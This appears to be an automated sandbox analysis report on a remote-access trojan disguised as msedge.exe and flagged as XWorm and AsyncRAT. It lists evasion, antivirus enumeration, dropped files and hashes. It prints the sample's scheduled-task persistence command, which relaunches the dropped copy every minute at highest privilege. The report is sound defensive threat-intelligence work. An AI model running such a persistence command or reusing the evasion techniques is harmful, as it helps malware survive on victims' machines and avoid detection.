Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595909s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595612s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595470s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -593938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 3428	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 3992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 3716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 1700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598713	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598607	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598482	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596283	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596163	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595909	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595612	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595470	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594282	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.14.dr	Binary or memory string: VMware
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin`
Source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWiv%SystemRoot%\system32\mswsock.dll<workflowInstanceQueries>
Source: Amcache.hve.14.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\msedge.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\msedge.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"

Jump to behavior

Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2y
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\msedge.exe	Queries volume information: C:\Users\user\Desktop\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: msedge.exe, 00000000.00000002.3550693887.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3561333873.000000001BA5E000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3550693887.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: msedge.exe, type: SAMPLE
Source: Yara match	File source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: msedge.exe, type: SAMPLE
Source: Yara match	File source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

ID:	1566853
Product:	CloudBasic
Start time:	18:44:04
Start date:	02.12.2024
Sample:	msedge.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	f1c2525da4f545e783535c2875962c13
SHA1:	92bf515741775fac22690efc0e400f6997eba735
SHA256:	9e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Windows Analysis Report
msedge.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_2c2ca92dcd483d7a57334730825da1e95a3edac_e2b55a38_ee85a960-0b5e-4b89-bdc6-b3f5bd0c3ccc\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	3766CC483EA759AD59689238E00911F5	937D073285671C09BAB5A177D2B5EA4C2D77AE52	9BB8A235008C8E649C8D3210BF6B2904ECFEBC0B2B15F6C2F377A4706A3FCA27
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A3A.tmp.dmp	Mini DuMP crash report, 16 streams, Mon Dec 2 17:48:02 2024, 0x1205a4 type	8A07918064BC32A7EA5E2131B1B50EF6	67AF4F77BF4AC115B7B4EDF54A518CE5F77B9170	58F5A0CA51BA2DB8FB2401D556F101816EA9083252161EE131D2FA59EEF1DCF7
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D19.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	F14E8191087C9E956688DBAF31316102	A8D57C6FD16D219C1D381B43509BFF87D99D0E1C	6B5DF8BED0D28A382CAD7222ED639916AF346B59E3BBF431F75162AA55C7A346
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D59.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	0EA84B06A4D5E4A19B64EF58F1ADD740	7E96319D665EFA4C02505A6A3AA718D1395982E1	AB114736A7228054ED07B0A6306EB2DADC7122A6EA97AE5221353A9D3DAE651F
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log	CSV text	30E4BDFC34907D0E4D11152CAEBE27FA	825402D6B151041BA01C5117387228EC9B7168BF	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
C:\Users\user\AppData\Local\Temp\Log.tmp	Generic INItialization configuration [WIN]	5362ACB758D5B0134C33D457FCC002D9	BC56DFFBE17C015DB6676CF56996E29DF426AB92	13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
C:\Users\user\AppData\Local\msedge.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	F1C2525DA4F545E783535C2875962C13	92BF515741775FAC22690EFC0E400F6997EBA735	9E6985FDB3BFA539F3D6D6FCA9AAF18356C28A00604C4F961562C34FA9F11D0F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 2 16:44:54 2024, mtime=Mon Dec 2 16:44:57 2024, atime=Mon Dec 2 16:44:57 2024, length=150016, window=hide	23B28B05CCE1C6B275C333E392DA5BD5	19FDEE658A57326026798D80AC1D6389B6604CFE	A7FD9E65A9F35910EC90A24586CFB0DF7604BD2B5961D1063FC5DA7F276E12EB
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	CA076E46157FDEE45DFCABC88ECAF5C7	D87413715638511FC722CAF03552AA5B71666D97	6835CB5C142F89AC21E5217573F32109434E507DD7E7ADD14D28DD14E7D6E048

Windows Analysis Report msedge.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
msedge.exe

Malware Threat Intel
Provided by